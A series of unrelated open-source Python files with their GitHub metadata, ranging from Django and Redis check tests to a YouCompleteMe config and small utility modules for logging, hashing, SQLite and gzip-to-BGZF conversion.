        Temporarily override plasticity of medium and long term internal state.
        This function should be implemented by all subclasses so that
        it preserves the ability of the Sheet to compute activity,
        i.e. to operate over a short time scale, while preventing any
        lasting changes to the state (if new_plasticity_state=False).
        Any operation that does not have any lasting state, such as
        those affecting only the current activity level, should not
        be affected by this call.
        By default, simply saves a copy of the plastic flag to an
        internal stack (so that it can be restored by
        restore_plasticity_state()), and then sets plastic to
        new_plasticity_state.
        """
        self._plasticity_setting_stack.append(self.plastic)
        self.plastic=new_plasticity_state
    def restore_plasticity_state(self):
        """
        Restores plasticity of medium and long term internal state after
        a override_plasticity_state call.
        This function should be implemented by all subclasses to
        remove the effect of the most recent override_plasticity_state call,
        i.e. to restore plasticity of any type that was overridden.
        """
        self.plastic = self._plasticity_setting_stack.pop()
    def n_bytes(self):
        """
        Return a lower bound for the memory taken by this sheet, in bytes.
        Typically, this number will include the activity array and any
        similar arrays, plus any other significant data owned (in some
        sense) by this Sheet. It will not usually include memory
        taken by the Python dictionary or various "housekeeping"
        attributes, which usually contribute only a small amount to
        the memory requirements.
        Subclasses should reimplement this method if they store a
        significant amount of data other than in the activity array.
        """
        return self.activity.nbytes
| {
"content_hash": "3bb470af0b81f4aa6f9d9072ee3c4477",
"timestamp": "",
"source": "github",
"line_count": 296,
"max_line_length": 136,
"avg_line_length": 39.442567567567565,
"alnum_prop": 0.6613276231263383,
"repo_name": "jesuscript/topo-mpi",
"id": "290c894989cbb1a624925cba9517b665527f55b2",
"size": "11675",
"binary": false,
"copies": "1",
"ref": "refs/heads/cleanmpi",
"path": "topo/base/sheet.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "28864"
},
{
"name": "Emacs Lisp",
"bytes": "21378"
},
{
"name": "PHP",
"bytes": "552321"
},
{
"name": "Perl",
"bytes": "32843"
},
{
"name": "Python",
"bytes": "3076894"
},
{
"name": "Shell",
"bytes": "4230"
},
{
"name": "Tcl",
"bytes": "433956"
}
],
"symlink_target": ""
} |
import random
from django.contrib.auth.models import User
from notification.models import NoticeType, NoticeSetting, ObservedItem
def generate():
    """Create a NoticeSetting for every (user, notice type) pair.

    Each setting is enabled with roughly 10% probability; the outcome
    for each pair is echoed to stdout.
    """
    for user in User.objects.all():
        for notice_type in NoticeType.objects.all():
            # Enable about 1 in 10 settings at random.
            en = random.random() <= 0.1
            # NOTE(review): the created object is bound but never used.
            notice_setting = NoticeSetting.objects.create(
                user=user,
                notice_type=notice_type,
                medium="1",
                send=en
            )
            # Python 2 print statement; 'En'/'Dis' chosen via and/or idiom.
            print "%sabled notices for %s on %s" % (en and 'En' or 'Dis',
                user, notice_type)
if __name__ == '__main__':
generate() | {
"content_hash": "8dad6d692e53b21ebb680787ab5d0834",
"timestamp": "",
"source": "github",
"line_count": 21,
"max_line_length": 73,
"avg_line_length": 29.61904761904762,
"alnum_prop": 0.5562700964630225,
"repo_name": "ingenieroariel/pinax",
"id": "215b9c1051dc21554fd07b8ff6468ca8cd59b599",
"size": "622",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "fixtures/generate/gen_notification.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "JavaScript",
"bytes": "3140"
},
{
"name": "Python",
"bytes": "520245"
}
],
"symlink_target": ""
} |
'''
Created on 2015-07-02
@author: mizhon
'''
import os
import time
import subprocess
from ADT.common import CommonActions
from Utility import util
from Logs import logger
# Module-level logger instance shared by main().
log = logger.Log()
def main():
try:
console_args = CommonActions.ca_receive_console_args()
args_tpl = CommonActions.ca_get_console_args(console_args)
action = args_tpl[0]
cfg_file_list = args_tpl[1]
if os.path.exists(util.RESULT_FOLDER):
pass
else:
p = subprocess.Popen(["mkdir", "-p", util.RESULT_FOLDER])
p.wait()
for cfg_file in cfg_file_list:
cmd_list = CommonActions.ca_get_cmds_list(action, cfg_file)
print "CMD_LIST:", cmd_list
for cmd in cmd_list:
log.info(cmd)
result = CommonActions.ca_exec_cmds(cmd)
print result
if CommonActions.tool == util.SYSBENCH:
#SysbenchActions.sa_save_results(result)
pass
elif CommonActions.tool == util.TPCCMYSQL:
#TpccmysqlActions.ta_save_results(result)
pass
'If more than one commands, sleep between each execution'
if len(cmd_list) > 1:
time.sleep(util.SLEEP_TIME)
exit(0)
except Exception as e:
log.error(e)
| {
"content_hash": "5c420acff01b1aca74b196b8a381b348",
"timestamp": "",
"source": "github",
"line_count": 56,
"max_line_length": 73,
"avg_line_length": 26.464285714285715,
"alnum_prop": 0.5222672064777328,
"repo_name": "mizhon/tools",
"id": "94084e61a5afe630fcef3d72c43a6685d2c93cd6",
"size": "1528",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "autodbperftool/ADT/adt.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "19819"
}
],
"symlink_target": ""
} |
import os
import unittest
from tethys_apps.static_finders import TethysStaticFinder
class TestTethysStaticFinder(unittest.TestCase):
    """Exercises TethysStaticFinder path resolution against the test app."""

    def setUp(self):
        # Repository root, derived from this test file's location.
        self.src_dir = os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(__file__))))
        # Public static directory of the bundled test app.
        self.root = os.path.join(self.src_dir, 'tests', 'apps', 'tethysapp-test_app',
                                 'tethysapp', 'test_app', 'public')

    def tearDown(self):
        pass

    def test_init(self):
        pass

    def test_find(self):
        finder = TethysStaticFinder()
        found = finder.find('test_app/css/main.css')
        self.assertEqual(os.path.join(self.root, 'css/main.css'), found)

    def test_find_all(self):
        finder = TethysStaticFinder()
        found = finder.find('test_app/css/main.css', all=True)
        self.assertIn(os.path.join(self.root, 'css/main.css'), found)

    def test_find_location_with_no_prefix(self):
        finder = TethysStaticFinder()
        found = finder.find_location(self.root, 'css/main.css', None)
        self.assertEqual(os.path.join(self.root, 'css/main.css'), found)

    def test_find_location_with_prefix_not_in_path(self):
        finder = TethysStaticFinder()
        found = finder.find_location(self.root, 'css/main.css', 'tethys_app')
        self.assertIsNone(found)

    def test_find_location_with_prefix_in_path(self):
        finder = TethysStaticFinder()
        found = finder.find_location(self.root, 'tethys_app/css/main.css', 'tethys_app')
        self.assertEqual(os.path.join(self.root, 'css/main.css'), found)

    def test_list(self):
        finder = TethysStaticFinder()
        app_paths = []
        for path, storage in finder.list(''):
            if 'test_app' in storage.location:
                app_paths.append(path)
        self.assertIn('js/main.js', app_paths)
        self.assertIn('images/icon.gif', app_paths)
        self.assertIn('css/main.css', app_paths)
| {
"content_hash": "cc06e66391b137255eeaf527e3c3f7a5",
"timestamp": "",
"source": "github",
"line_count": 67,
"max_line_length": 99,
"avg_line_length": 35.23880597014925,
"alnum_prop": 0.6340533672172808,
"repo_name": "CI-WATER/tethys",
"id": "ea0bb1a414e3fb30af58b9a192adf729e36356e2",
"size": "2361",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/unit_tests/test_tethys_apps/test_static_finders.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "CSS",
"bytes": "175789"
},
{
"name": "HTML",
"bytes": "149728"
},
{
"name": "JavaScript",
"bytes": "360375"
},
{
"name": "Python",
"bytes": "592551"
}
],
"symlink_target": ""
} |
import mock
import pytest
from datadog_checks.base import ConfigurationError
from datadog_checks.redis_sentinel import RedisSentinelCheck
# Metrics the check is expected to emit (asserted in test_check).
METRICS = [
    'redis.sentinel.odown_slaves',
    'redis.sentinel.sdown_slaves',
    'redis.sentinel.ok_slaves',
    'redis.sentinel.ok_sentinels',
    'redis.sentinel.known_sentinels',
    'redis.sentinel.known_slaves',
    'redis.sentinel.link_pending_commands',
]
# Service checks the check is expected to report (asserted in test_check).
SERVICE_CHECKS = [
    'redis.sentinel.master_is_disconnected',
    'redis.sentinel.master_is_down',
    'redis.sentinel.slave_is_disconnected',
    'redis.sentinel.slave_master_link_down',
]
# Name used when instantiating RedisSentinelCheck in the tests below.
CHECK_NAME = 'redis_sentinel'
@pytest.mark.unit
def test_load_config():
    """_load_config rejects bad host/port combinations and parses valid ones."""
    check = RedisSentinelCheck('redis_sentinel', {}, {})

    # An empty instance is rejected outright.
    with pytest.raises(ConfigurationError):
        check._load_config({})
    # sentinel_port missing entirely.
    with pytest.raises(ConfigurationError):
        check._load_config({'sentinel_host': 'localhost'})
    # sentinel_port must be an integer -- not a float ...
    with pytest.raises(ConfigurationError):
        check._load_config({'sentinel_host': 'localhost', 'sentinel_port': 123.0})
    # ... and not a string.
    with pytest.raises(ConfigurationError):
        check._load_config({'sentinel_host': 'localhost', 'sentinel_port': 'port'})

    # Integer port with no password defined.
    host, port, password = check._load_config(
        {'sentinel_host': 'localhost', 'sentinel_port': 123, 'masters': 'mymaster'}
    )
    assert host == 'localhost'
    assert port == 123
    assert password is None

    # Integer port with a password defined.
    host, port, password = check._load_config(
        {'sentinel_host': 'localhost', 'sentinel_port': 123, 'masters': 'mymaster', 'sentinel_password': 'password1'}
    )
    assert host == 'localhost'
    assert port == 123
    assert password == 'password1'
@pytest.mark.integration
@pytest.mark.usefixtures('dd_environment')
def test_check(aggregator, instance):
    """
    Testing Redis_sentinel check.
    """
    sentinel_check = RedisSentinelCheck(CHECK_NAME, {}, {})
    sentinel_check.check(instance)
    # Every expected metric and service check must have been reported.
    for metric_name in METRICS:
        aggregator.assert_metric(metric_name, at_least=1)
    for service_check in SERVICE_CHECKS:
        aggregator.assert_service_check(service_check, status=RedisSentinelCheck.OK, count=1)
    aggregator.assert_all_metrics_covered()
@pytest.mark.integration
@pytest.mark.usefixtures('dd_environment')
def test_down_slaves(aggregator, instance):
    """
    Testing Redis_sentinel check.
    """
    check = RedisSentinelCheck(CHECK_NAME, {}, {})
    # Fake 5 objectively-down and 7 subjectively-down slaves.
    fake_slaves = [{'is_odown': True, 'is_sdown': False} for _ in range(5)]
    fake_slaves += [{'is_odown': False, 'is_sdown': True} for _ in range(7)]
    with mock.patch('redis.StrictRedis.sentinel_slaves', return_value=fake_slaves):
        check.check(instance)
    aggregator.assert_metric('redis.sentinel.odown_slaves', 5)
    aggregator.assert_metric('redis.sentinel.sdown_slaves', 7)
| {
"content_hash": "59c0de3df59bc46cd32525ef4828ff50",
"timestamp": "",
"source": "github",
"line_count": 99,
"max_line_length": 118,
"avg_line_length": 31.161616161616163,
"alnum_prop": 0.6774716369529984,
"repo_name": "DataDog/integrations-extras",
"id": "703152be9b964a6d51e28aa63537dcbf4eaca1c3",
"size": "3085",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "redis_sentinel/tests/test_redis_sentinel.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Dockerfile",
"bytes": "4265"
},
{
"name": "Go",
"bytes": "4119"
},
{
"name": "PHP",
"bytes": "3192"
},
{
"name": "Python",
"bytes": "1219552"
},
{
"name": "Ruby",
"bytes": "8005"
},
{
"name": "Shell",
"bytes": "4237"
}
],
"symlink_target": ""
} |
from .. import settings
from copy import copy
def _get_group_id_by_name(group_name, connection):
group = connection.getObject('ExperimenterGroup', attributes={'name': group_name})
if group:
return group.id
else:
return None
def _get_current_group_id(connection):
return connection.getGroupFromContext().id
def switch_to_default_search_group(connection):
    """Activate the configured default search group for this session.

    No-op when DEFAULT_SEARCH_GROUP is unset, when no group with that name
    exists, or when that group is already the session's active group.
    """
    if not settings.DEFAULT_SEARCH_GROUP:
        return
    target_id = _get_group_id_by_name(settings.DEFAULT_SEARCH_GROUP, connection)
    if target_id and target_id != _get_current_group_id(connection):
        connection.setGroupForSession(target_id)
def _adapt_ellipse_roi(roi_json):
new_json = copy(roi_json)
try:
new_json['cx'] = new_json.pop('x')
new_json['cy'] = new_json.pop('y')
new_json['rx'] = new_json.pop('radiusX')
new_json['ry'] = new_json.pop('radiusY')
except KeyError:
pass
return new_json
def adapt_rois_json(rois):
    """Return ROIs with 'Ellipse' entries converted to SVG-style keys; others pass through."""
    return [
        _adapt_ellipse_roi(roi) if roi['type'] == 'Ellipse' else roi
        for roi in rois
    ]
| {
"content_hash": "a74101a924965cabbe225698d3ba9dd0",
"timestamp": "",
"source": "github",
"line_count": 43,
"max_line_length": 86,
"avg_line_length": 27.651162790697676,
"alnum_prop": 0.6274179983179142,
"repo_name": "crs4/ome_seadragon",
"id": "f2c7dbd547b58e9a0fcd2906d95cd248d868a7d7",
"size": "2287",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "ome_data/utils.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "108694"
},
{
"name": "JavaScript",
"bytes": "139137"
},
{
"name": "Python",
"bytes": "169825"
},
{
"name": "Shell",
"bytes": "4176"
}
],
"symlink_target": ""
} |
from gzip import open as gzip_open
from shutil import copyfileobj, move
from Bio.bgzf import open as bgzf_open
def gzip_decompress_and_bgzip_compress_file(gzip_file_path):
    """Re-compress a gzip file as BGZF in place and return its path.

    The decompressed stream is written through bgzf to a temporary sibling
    file ("<path>.temporary"), which is then moved over the original, so the
    file at *gzip_file_path* ends up BGZF-compressed under its original name.
    NOTE(review): the original suffix (e.g. ".gz") is kept even though the
    container format changes to BGZF — confirm callers expect that.
    """
    with gzip_open(gzip_file_path) as gzip_file:
        bgzip_file_path = gzip_file_path
        bgzip_file_path_temporary = "{}.temporary".format(bgzip_file_path)
        # Writing to a temp file first keeps the original intact if bgzf
        # compression fails part-way through.
        with bgzf_open(bgzip_file_path_temporary, mode="wb") as bgzip_file_temporary:
            copyfileobj(gzip_file, bgzip_file_temporary)
        move(bgzip_file_path_temporary, bgzip_file_path)
    return bgzip_file_path
| {
"content_hash": "fd9108f0ac74a18db1b11c91eb49df48",
"timestamp": "",
"source": "github",
"line_count": 21,
"max_line_length": 85,
"avg_line_length": 27.142857142857142,
"alnum_prop": 0.7070175438596491,
"repo_name": "UCSD-CCAL/ccal",
"id": "aeb1971a6ae25fbc73836fe0a80fab9e3751ad64",
"size": "570",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ccal/gzip_decompress_and_bgzip_compress_file.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "20830"
},
{
"name": "Python",
"bytes": "294577"
}
],
"symlink_target": ""
} |
import os
import ycm_core
# These are the compilation flags that will be used in case there's no
# compilation database set (by default, one is not set).
# CHANGE THIS LIST OF FLAGS. YES, THIS IS THE DROID YOU HAVE BEEN LOOKING FOR.
flags = [
'-Wall',
'-Wextra',
'-Werror',
# '-Wc++98-compat',
'-Wno-long-long',
'-Wno-variadic-macros',
'-fexceptions',
'-DNDEBUG',
# You 100% do NOT need -DUSE_CLANG_COMPLETER in your flags; only the YCM
# source code needs it.
'-DUSE_CLANG_COMPLETER',
# THIS IS IMPORTANT! Without a "-std=<something>" flag, clang won't know which
# language to use when compiling headers. So it will guess. Badly. So C++
# headers will be compiled as C headers. You don't want that so ALWAYS specify
# a "-std=<something>".
# For a C project, you would set this to something like 'c99' instead of
# 'c++11'.
'-std=c++11',
# ...and the same thing goes for the magic -x option which specifies the
# language that the files to be compiled are written in. This is mostly
# relevant for c++ headers.
# For a C project, you would set this to 'c' instead of 'c++'.
'-x',
'c++',
# c/c++ include path
'-isystem',
'/usr/include',
'-isystem',
'/usr/local/include',
# Multiple libstdc++ version directories are listed so the same config works
# across machines; non-existent include paths are harmless to clang.
'-isystem',
'/usr/include/c++/4.8',
'-isystem',
'/usr/include/c++/4.8.5',
'-isystem',
'/usr/include/c++/4.9.3',
'-isystem',
'/usr/include/c++/5',
'-isystem',
'/usr/include/c++/5.1',
'-isystem',
'/usr/include/c++/5.2',
'-isystem',
'/usr/include/c++/5.3',
'-isystem',
'/usr/include/c++/6',
'-isystem',
'/usr/include/c++/6.1',
# 3rdParty include path
'-isystem',
'/usr/local/3rdParty/boost/include',
'-isystem',
'/usr/local/3rdParty/log4cpp/include',
'-isystem',
'/usr/local/3rdParty/thrift/include',
'-isystem',
'/usr/local/3rdParty/RCF/include',
'-isystem',
'/usr/local/3rdParty/zeromq/include',
'-isystem',
'/usr/local/3rdParty/ssl/include',
'-isystem',
'/usr/local/3rdParty/uuid/include',
# project include path
'-isystem',
'../include',
'-isystem',
'./MessageDef',
#'-isystem',
# This path will only work on OS X, but extra paths that don't exist are not
# harmful
#'/System/Library/Frameworks/Python.framework/Headers',
#'-isystem',
#'../llvm/include',
#'-isystem',
#'../llvm/tools/clang/include',
#'-I',
#'.',
#'-I',
#'./ClangCompleter',
#'-isystem',
#'./tests/gmock/gtest',
#'-isystem',
#'./tests/gmock/gtest/include',
#'-isystem',
#'./tests/gmock',
#'-isystem',
#'./tests/gmock/include',
]
# Set this to the absolute path to the folder (NOT the file!) containing the
# compile_commands.json file to use that instead of 'flags'. See here for
# more details: http://clang.llvm.org/docs/JSONCompilationDatabase.html
#
# You can get CMake to generate this file for you by adding:
# set( CMAKE_EXPORT_COMPILE_COMMANDS 1 )
# to your CMakeLists.txt file.
#
# Most projects will NOT need to set this to anything; you can just change the
# 'flags' list of compilation flags. Notice that YCM itself uses that approach.
compilation_database_folder = ''
# An empty folder string never exists, so 'database' stays None and the static
# 'flags' list above is used by FlagsForFile.
if os.path.exists( compilation_database_folder ):
  database = ycm_core.CompilationDatabase( compilation_database_folder )
else:
  database = None
# Source extensions tried when looking up flags for a header file.
SOURCE_EXTENSIONS = [ '.cpp', '.cxx', '.cc', '.c', '.m', '.mm' ]
def DirectoryOfThisScript():
  """Return the absolute path of the directory containing this config file."""
  script_path = os.path.abspath( __file__ )
  return os.path.dirname( script_path )
def MakeRelativePathsInFlagsAbsolute( flags, working_directory ):
  """Return a copy of *flags* with relative paths rooted at *working_directory*.

  Handles both the two-token form ('-I', 'path') and the fused form
  ('-Ipath') for every prefix in path_flags.  With no working directory
  the flags are returned unchanged (as a new list).
  """
  if not working_directory:
    return list( flags )
  path_flags = [ '-isystem', '-I', '-iquote', '--sysroot=' ]
  absolute_flags = []
  expecting_path = False
  for flag in flags:
    current = flag
    if expecting_path:
      # Previous token was a bare path flag: this token is its path.
      expecting_path = False
      if not flag.startswith( '/' ):
        current = os.path.join( working_directory, flag )
    for prefix in path_flags:
      if flag == prefix:
        expecting_path = True
        break
      if flag.startswith( prefix ):
        relative = flag[ len( prefix ): ]
        current = prefix + os.path.join( working_directory, relative )
        break
    if current:
      absolute_flags.append( current )
  return absolute_flags
def IsHeaderFile( filename ):
  """Return True when *filename* carries a C/C++ header extension."""
  return os.path.splitext( filename )[ 1 ] in ( '.h', '.hxx', '.hpp', '.hh' )
def GetCompilationInfoForFile( filename ):
  """Return the database's compilation info for *filename*, or None.

  Only called when the module-level 'database' is set (see FlagsForFile).
  For headers, which have no database entries, the flags of a sibling
  source file with the same basename are borrowed instead.
  """
  # The compilation_commands.json file generated by CMake does not have entries
  # for header files. So we do our best by asking the db for flags for a
  # corresponding source file, if any. If one exists, the flags for that file
  # should be good enough.
  if IsHeaderFile( filename ):
    basename = os.path.splitext( filename )[ 0 ]
    for extension in SOURCE_EXTENSIONS:
      replacement_file = basename + extension
      if os.path.exists( replacement_file ):
        compilation_info = database.GetCompilationInfoForFile(
          replacement_file )
        if compilation_info.compiler_flags_:
          return compilation_info
    # No sibling source file found: give the caller nothing to work with.
    return None
  return database.GetCompilationInfoForFile( filename )
def FlagsForFile( filename, **kwargs ):
  """YCM entry point: return {'flags': [...], 'do_cache': True} for *filename*.

  With a compilation database, flags come from the database entry (relative
  paths made absolute against the entry's working dir); without one, the
  static 'flags' list is used, rooted at this script's directory.
  Returns None when the database has no usable entry for the file.
  """
  if database:
    # Bear in mind that compilation_info.compiler_flags_ does NOT return a
    # python list, but a "list-like" StringVec object
    compilation_info = GetCompilationInfoForFile( filename )
    if not compilation_info:
      return None
    final_flags = MakeRelativePathsInFlagsAbsolute(
      compilation_info.compiler_flags_,
      compilation_info.compiler_working_dir_ )
    # NOTE: This is just for YouCompleteMe; it's highly likely that your project
    # does NOT need to remove the stdlib flag. DO NOT USE THIS IN YOUR
    # ycm_extra_conf IF YOU'RE NOT 100% SURE YOU NEED IT.
    try:
      final_flags.remove( '-stdlib=libc++' )
    except ValueError:
      pass
  else:
    relative_to = DirectoryOfThisScript()
    final_flags = MakeRelativePathsInFlagsAbsolute( flags, relative_to )
  return {
    'flags': final_flags,
    'do_cache': True
  }
| {
"content_hash": "f3fc80c1d8ae5a37c04c69eb0c0f6289",
"timestamp": "",
"source": "github",
"line_count": 203,
"max_line_length": 80,
"avg_line_length": 28.635467980295566,
"alnum_prop": 0.675038706347841,
"repo_name": "chxuan/samples",
"id": "aba10f84d0e813a3d4d062e30ac7f0f6a4f1c9f4",
"size": "7213",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "framework/net-rcf/tests/.ycm_extra_conf.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "2991"
},
{
"name": "C++",
"bytes": "1582151"
},
{
"name": "CMake",
"bytes": "32195"
},
{
"name": "Python",
"bytes": "69341"
},
{
"name": "Shell",
"bytes": "4139"
},
{
"name": "Thrift",
"bytes": "73"
}
],
"symlink_target": ""
} |
from datetime import datetime
import sys
import time
import sqlite3
import hashlib
#TODO: make this as class
#class Utils:
pythonV2 = sys.version_info[0] == 2  # True when running under Python 2.
DEBUG=True  # Master switch for debug() logging.
DEBUG_FILE="debug.log"  # debug() log target; set to None to skip file output.
ERROR_FILE="error.log"  # Destination for error() tracebacks.
def debug(str):
    """Append a timestamped message to DEBUG_FILE when DEBUG is enabled."""
    if not DEBUG:
        return
    stamped = "%s: %s" % (datetime.now(), str)
    if DEBUG_FILE is not None:
        with open(DEBUG_FILE, "a") as log:
            log.write("%s\n" % stamped)
    #print msg
def prompt(str):
    """Read one line of input shown with prompt *str*; return it as text.

    Bug fix: the original decoded the result with ``unicode(inputStr, "UTF-8")``
    unconditionally, which raises NameError on Python 3 where ``unicode``
    does not exist and ``input()`` already returns text.  Decoding now
    happens only on Python 2.
    """
    if pythonV2:
        # raw_input returns a byte string on Python 2; decode explicitly.
        return unicode(raw_input(str), "UTF-8")
    # Python 3: input() already returns str (unicode).
    return input(str)
def boolValue(value):
    """Loosely interpret *value* as a boolean ('yes'/'true'/'on'/'1'/etc.)."""
    truthy_words = ("yes", "y", "true", "on", "t", "1")
    return str(value).lower() in truthy_words
def error():
    """Print the active exception traceback and append it, timestamped, to ERROR_FILE."""
    import traceback
    trace = traceback.format_exc()
    print(trace)
    appendToFile(ERROR_FILE, "%s: %s" % (datetime.now(), trace))
def appendToFile(filename, str):
    """Append *str* to *filename*, one line per entry, newline-terminated.

    Bug fix: the module previously defined appendToFile twice — a
    list-taking overload followed by a string-taking one.  Python has no
    overloading, so the second definition silently shadowed the first
    (which was also broken: it recursed into the string version per item
    only by accident of shadowing).  This single definition accepts either
    a string or a list of strings, preserving both call styles.
    """
    lines = str if isinstance(str, list) else [str]
    with open(filename, "a") as file:
        for line in lines:
            file.write(line)
            file.write("\n")
def appendToLogFile(str):
    """Append *str* plus a newline to the game's log file."""
    with open("mazingame_log.txt", "a") as logfile:
        logfile.write(str)
        logfile.write("\n")
def readFileAsString(filename):
    """Read *filename* and return its entire contents as a single string."""
    with open(filename, "r") as source:
        return "".join(source)
def sha256(str):
    """Return the hexadecimal SHA-256 digest of *str*.

    Bug fix: hashlib.sha256 requires bytes on Python 3, so the original
    raised TypeError for text input.  Text is now UTF-8 encoded first;
    bytes input is hashed as-is.
    """
    data = str if isinstance(str, bytes) else str.encode("utf-8")
    sha = hashlib.sha256(data)
    return sha.hexdigest()
def currentDate():
    """Return the current local date formatted as 'YYYY-MM-DD'."""
    return datetime.fromtimestamp(currentTimestamp()).strftime('%Y-%m-%d')
def currentTimeMillis():
    """Return the current epoch time in whole milliseconds."""
    millis = time.time() * 1000
    return int(round(millis))
def currentTimestamp():
    """Return the current epoch time in seconds as a float."""
    now = time.time()
    return now
def formatTimestamp(timestamp):
    """Format an epoch *timestamp* as 'YYYY-MM-DD HH:MM:SS' in local time."""
    moment = datetime.fromtimestamp(timestamp)
    return moment.strftime('%Y-%m-%d %H:%M:%S')
def currentTimeISO8601():
    """Return current UTC time as an ISO8601 timestamp 'YYYY-MM-DD HH:MM:SS.SSS'."""
    stamp = datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f')
    # strftime's %f yields microseconds; trim to milliseconds.
    return stamp[:-3]
#SQLITE
def openDatabase(file, inMemory=False):
    """Open a SQLite database (file-backed, or in-memory when *inMemory*).

    Rows are returned as sqlite3.Row so columns are addressable by name.
    Returns a (connection, cursor) tuple.
    """
    target = ':memory:' if inMemory == True else file
    conn = sqlite3.connect(target)
    conn.row_factory = sqlite3.Row
    return (conn, conn.cursor())
def closeDatabase(connection):
    """Close a SQLite connection; a None *connection* is silently ignored."""
    if connection is None:
        return
    connection.close()
| {
"content_hash": "f426ab957be07637a55312c37301ac99",
"timestamp": "",
"source": "github",
"line_count": 106,
"max_line_length": 74,
"avg_line_length": 22.660377358490567,
"alnum_prop": 0.6353039134054954,
"repo_name": "samisalkosuo/mazingame",
"id": "99e548822a640b6cb70d8730d9ab243affe6efc9",
"size": "3548",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "mazingame/utils/utils.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "46296"
},
{
"name": "Shell",
"bytes": "521"
}
],
"symlink_target": ""
} |
import datetime
from django.test import TestCase
from django.urls.base import reverse
from mock import patch
from oauthlib.common import generate_token
from bridge_lti.models import LtiContentSource, LtiLmsPlatform
from module.mixins.views import GroupEditFormMixin
from module.models import (
Activity, BridgeUser, Collection, CollectionOrder, ContributorPermission, Engine, GradingPolicy, ModuleGroup
)
# Grading policy choices exercised by the grading-policy form tests below.
GRADING_POLICIES = (
    # value, display_name
    ('trials_count', 'Trials count', ),
    ('points_earned', 'Points earned',),
)
class BridgeTestCase(TestCase):
    """Common fixture base for the module view tests.

    setUp creates a logged-in owner, three collections, both grading
    policies, a mock engine, a module group with two collection orders,
    and an LTI platform record used by LTI-related tests.
    """
    fixtures = ['gradingpolicy', 'engine', 'api', 'bridge']
    group_prefix = GroupEditFormMixin.prefix
    grading_prefix = GroupEditFormMixin.grading_prefix
    def add_prefix(self, prefix='', data=None):
        """Add prefix to form data dict, which will be send as POST or GET to view."""
        data = data or {}
        return {"{}-{}".format(prefix, k): v for k, v in data.items()}
    @patch('module.tasks.sync_collection_engines.apply_async')
    def setUp(self, mock_apply_async):
        # sync_collection_engines is patched so collection creation does not
        # schedule a real Celery task during fixture set-up.
        self.user = BridgeUser.objects.create_user(
            username='test',
            password='test',
            email='test@me.com'
        )
        self.client.login(username='test', password='test')
        # collections
        self.collection1 = Collection.objects.create(name='col1', owner=self.user)
        self.collection2 = Collection.objects.create(name='col2', owner=self.user)
        self.collection3 = Collection.objects.create(name='col3', owner=self.user)
        # grading policies
        self.trials_count = GradingPolicy.objects.get(name='trials_count')
        self.points_earned = GradingPolicy.objects.get(name='points_earned')
        self.engine = Engine.objects.create(engine='engine_mock', engine_name='mockEngine')
        self.test_cg = ModuleGroup.objects.create(name='TestColGroup', owner=self.user)
        self.collection_order1 = CollectionOrder.objects.create(
            slug="collection_order1",
            group=self.test_cg,
            collection=self.collection1,
            engine=self.engine,
            grading_policy=self.points_earned
        )
        self.collection_order3 = CollectionOrder.objects.create(
            slug="collection_order3",
            group=self.test_cg,
            collection=self.collection3,
            engine=self.engine,
            grading_policy=self.trials_count
        )
        self.group_update_data = {
            'name': "CG2",
            'owner': self.user.id,
            'description': 'Some description for a group',
        }
        self.group_post_data = self.add_prefix(self.group_prefix, self.group_update_data)
        # LtiLmsPlatform
        self.lti_lms_platform = LtiLmsPlatform.objects.create(
            consumer_name='consumer_name',
            # This method generates a valid consumer_key.
            # The valid consumer_key is used in the test for checking LTI query.
            consumer_key=generate_token(length=25),
            consumer_secret='consumer_secret',
            expiration_date=datetime.datetime.today() + datetime.timedelta(days=1),
            lms_metadata='lms_metadata'
        )
class TestCollectionList(BridgeTestCase):
    """Smoke tests for the collection list view, with and without a group slug."""
    def test_without_group_slug(self):
        """Test collection list view without group slug."""
        url = reverse('module:collection-list')
        response = self.client.get(url)
        self.assertEqual(response.status_code, 200)
    def test_with_group_id(self):
        """Test collection list view with group slug."""
        url = reverse('module:collection-list', kwargs={'group_slug': self.test_cg.slug})
        response = self.client.get(url)
        self.assertEqual(response.status_code, 200)
class TestCollectionGroup(BridgeTestCase):
    """Create / list / update flows for ModuleGroup views."""
    def test_create_cg_page_works(self):
        """Test that ModuleGroup page works correctly contain valid context and response code is 200."""
        url = reverse('module:group-add')
        response = self.client.get(url)
        self.assertEqual(response.status_code, 200)
        self.assertIn('form', response.context)
        groups_count = ModuleGroup.objects.count()
        policy_data = {'name': self.trials_count.name}
        data = {}
        data.update(self.group_post_data)
        data.update(policy_data)
        response = self.client.post(url, data=data)
        # A successful creation responds 202 with a JSON ack, not a redirect.
        self.assertEqual(ModuleGroup.objects.count(), groups_count + 1)
        self.assertEqual(response.status_code, 202)
        self.assertEqual(response.content, b'{"status": "ok"}')
    def test_cg_list(self):
        """Test ModuleGroup list page. Check that response code is 200, `groups` is in context and is not empty."""
        url = reverse('module:group-list')
        response = self.client.get(url)
        self.assertEqual(response.status_code, 200)
        self.assertIn('groups', response.context)
        self.assertIsNotNone(response.context['groups'])
        self.assertEqual(
            list(response.context['groups'].values_list('id', flat=True)),
            list(ModuleGroup.objects.filter(owner=self.user).values_list('id', flat=True))
        )
    def test_update_cg(self):
        """Test update ModuleGroup page, check that updated collection group is really updated."""
        groups_count = ModuleGroup.objects.count()
        url = reverse('module:group-change', kwargs={'group_slug': self.test_cg.slug})
        response = self.client.get(url)
        self.assertEqual(response.status_code, 200)
        self.assertIn('form', response.context)
